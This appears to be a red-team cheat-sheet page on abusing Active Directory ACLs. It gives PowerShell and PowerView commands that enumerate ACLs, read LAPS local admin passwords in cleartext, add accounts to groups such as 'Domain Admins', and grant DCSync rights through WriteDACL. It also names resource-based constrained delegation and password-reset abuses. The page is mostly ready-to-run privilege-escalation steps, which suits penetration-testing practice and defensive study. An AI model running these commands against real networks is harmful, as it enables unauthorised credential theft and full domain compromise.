ACL Abuse

Enumeration

# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

Find-InterestingDomainACL -ResolveGUIDs

Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.

# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group

# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

GenericAll over User Object

Can reset their password without knowing the old one

WriteDACL over DC

Can give DCSync privs to user

Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync

Resources

Abusing Active Directory ACLs/ACEsRed Teaming Experiments

PreviousEscalation NextKerberoasting

Last updated 4 years ago

Was this helpful?